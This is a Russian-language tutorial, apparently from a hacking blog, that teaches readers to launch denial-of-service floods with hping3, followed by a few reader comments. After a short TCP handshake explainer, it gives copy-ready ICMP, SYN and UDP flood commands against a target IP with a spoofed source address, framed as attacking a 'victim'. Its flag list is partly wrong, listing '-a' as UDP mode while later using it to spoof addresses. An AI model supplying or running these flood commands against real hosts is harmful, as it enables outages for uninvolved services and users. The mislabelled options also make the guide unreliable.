Все наверное знакомы со словом DOS атака (Denial Of service) и с его значением. Есть много способов как сделать(инициировать) DOS атаку. Давайте сначала поймем саму суть этой атаки. Так как в предыдущем уроке я объяснил как работает Wireshark, то вы должны понимать уже что такое пакеты, сетевой трафик и знать приблизительно как работает сеть. Сегодня мы окунемся глубже во всем чтобы смогли сделать мощные DOS атаки.
Что такое Dos атака?
Dos атака — атака на определенную сеть имея цель вывести сеть из строя загрузив её пере избыточным бесполезным трафиком.
Бывает много типов DOS атак. К примеру: все увлекались открытием множество терминалов и пинговали сайты или определенные Ip-адресы в своей сети. Этот тип атаки называется ICMP Flooding. Также бывают SYN Flood, Teardrop, Nuke и тгд.
Для успешного выполнения такой атаки нужно знать TCP/IP базу.
TCP/IP базовые знания
Давайте представим что клиенту нужные данные с какого-то сервера, для этого нужно осуществить подключение. Оно происходит таким образом:
- Клиент отправляет SYN пакет к Серверу
- Сервер отвечает с SYN+ACK пакетом
- Клиент отправляет ACK пакет
- Соединение установленно
SYN — SYNchronize (Осуществить подключение)
ACK — ACKnowledgement (Подтверждение к клиенту что SYN принят)
Теперь когда вы поняли как работают соединения между клиентами и серверами вы сможете делать мощные DOS атаки.
Что нужно для DOS атаки
Нам нужен установленный Hping3. Он уже установлен в стандартном пакете Kali Linux и Backtrack.
Что такое
Hping3 является сетевым инструментом способен отправлять пользовательские пакеты TCP/IP и отображать их как пинг программа. Также он способен сканировать сети, находить открытые порты, проходить сквозь Firewall, и многое другое. Его полные возможности мы раскроем в будущем.
Команды Hping3 для Dos атаки
Как я уже говорил Hping3 весьма сериозный инструмент. Вот нужные команды для выполнения Dos атаки.
- –flood : отправляет пакеты с самой большой скоростью без ответки.
- -I : выбираем нужный интерфейс если у вас их больше
- -1 : ICMP мод
- -a : UDP мод
- -p : назначение порта
- -S : выбираем SYN флаг
Dos атака с Hping3
К примеру вы хотите атаковать IP адрес 11.11.11.11 с пинг запросами от IP адреса qq.qq.qq.qq
hping3 -1 --flood -a qq.qq.qq.qq 11.11.11.11
Если хотите зафлудить IP 11.11.11.11 на порте 80 с SYN запросами с ложного IP qq.qq.qq.qq
hping3 -S -a qq.qq.qq.qq --flood -p 80 11.11.11.11
Hping3 будет отправлять SYN запросы на порте 80. Жертва будет вынуждена отвечать с SYN+ACK. Так как мы используем выдуманный IP-адрес соединение никогда не осуществится. Это будет нагружать трафик жертвы и употреблять ее ресурсы тем самым жертва будет перегружена пустым трафиком.
Стандартные опции Hping3 это атаковать TCP порты. Чтобы изменить атаку на UDP порт просто используем команду -2.
hping3 --flood -a qq.qq.qq.qq -2 -p 443 11.11.11.11. Теперь Hping будет посылать запросы на указанный UDP порт. Как пример я взял 443.
Это всего лишь капля в море по сравнению того как профессионалы используют данный инструмент. В следующих уроках мы покажем вам другие очень полезные способности этой программы.
Stay with this guys, you’re helnipg a lot of people.
не получается пишет: Unable to resolve ‘qq.qq.qq.qq’
Попробуй вместо q писать с как доллар заглавными
не получается пишет: Unable to resolve ‘qq.qq.qq.qq’